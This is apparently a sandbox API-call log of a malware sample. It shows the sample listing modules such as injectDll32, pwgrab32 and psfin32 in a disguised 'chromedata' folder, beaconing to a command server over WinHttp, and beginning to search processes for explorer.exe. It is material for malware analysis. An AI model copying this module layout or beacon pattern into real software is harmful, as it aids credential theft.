	[0234.174] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.174] GetFileTime (in: hFile=0x624, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.174] CloseHandle (hObject=0x624) returned 1
	[0234.175] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.175] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.175] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.175] GetFileTime (in: hFile=0x624, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.175] CloseHandle (hObject=0x624) returned 1
	[0234.175] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.175] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.175] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0234.175] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0234.175] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b69c0
	[0234.175] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70fa1b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0234.175] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0234.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22b75c0
	[0234.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x231fc00
	[0234.175] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0234.175] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0234.175] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b75c0, Size=0x10) returned 0x22b7518
	[0234.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22b3100
	[0234.175] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0234.175] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0234.175] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b7518, Size=0x10) returned 0x22b75c0
	[0234.175] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x22eb8b0
	[0234.176] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0234.176] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0234.176] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b75c0, Size=0x10) returned 0x22b7518
	[0234.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8780
	[0234.176] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0234.176] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0234.176] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22b7518, Size=0x20) returned 0x231c810
	[0234.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b8998
	[0234.176] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0234.176] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x231c810, Size=0x20) returned 0x231ef20
	[0234.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745158
	[0234.176] FindNextFileW (in: hFindFile=0x22b69c0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 0
	[0234.176] GetLastError () returned 0x12
	[0234.176] FindClose (in: hFindFile=0x22b69c0 | out: hFindFile=0x22b69c0) returned 1
	[0234.176] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0234.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0234.176] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x2745370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0234.176] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.176] GetFileTime (in: hFile=0x624, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.176] CloseHandle (hObject=0x624) returned 1
	[0234.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.177] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0234.177] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0234.177] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0234.177] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x2745370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0234.177] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.177] GetFileTime (in: hFile=0x624, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.177] CloseHandle (hObject=0x624) returned 1
	[0234.177] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.177] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0234.177] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0234.177] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0234.177] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x2745370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0234.177] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.177] GetFileTime (in: hFile=0x624, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.177] CloseHandle (hObject=0x624) returned 1
	[0234.178] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.178] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0234.178] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0234.178] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0234.178] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x2745370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0234.178] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.178] GetFileTime (in: hFile=0x624, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.178] CloseHandle (hObject=0x624) returned 1
	[0234.178] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.178] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0234.178] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0234.178] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0234.178] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x2745370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0234.178] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.178] GetFileTime (in: hFile=0x624, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.179] CloseHandle (hObject=0x624) returned 1
	[0234.179] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0234.179] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0234.179] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x2745370
	[0234.179] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x2745370, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0234.179] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x624
	[0234.179] GetFileTime (in: hFile=0x624, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0234.179] CloseHandle (hObject=0x624) returned 1
	[0234.179] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x736c2500, dwHighDateTime=0x1d50a6a)) 
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745370) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2745158) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8998) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22eb8b0) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b3100) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231fc00) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef20) returned 1
	[0234.179] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0234.180] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7500
	[0234.180] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0234.180] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0234.180] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/uEUk4KeuAQk4OiyIcwCSi2Mcw/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0234.180] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0234.180] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0234.509] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0234.509] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0234.509] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0234.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9c0
	[0234.509] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22ff9c0, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ff9c0*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0234.509] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0234.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ff9c0, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0234.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9f0
	[0234.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ff9c0, cbMultiByte=3, lpWideCharStr=0x22ff9f0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0234.509] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0234.509] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0234.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff18
	[0234.509] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa50
	[0234.509] lstrcpynW (in: lpString1=0x22ffa50, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0234.509] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad378) returned 1
	[0234.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9f0) returned 1
	[0234.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff18) returned 1
	[0234.510] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9c0) returned 1
	[0234.510] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x600
	[0234.512] Process32FirstW (in: hSnapshot=0x600, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0234.513] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
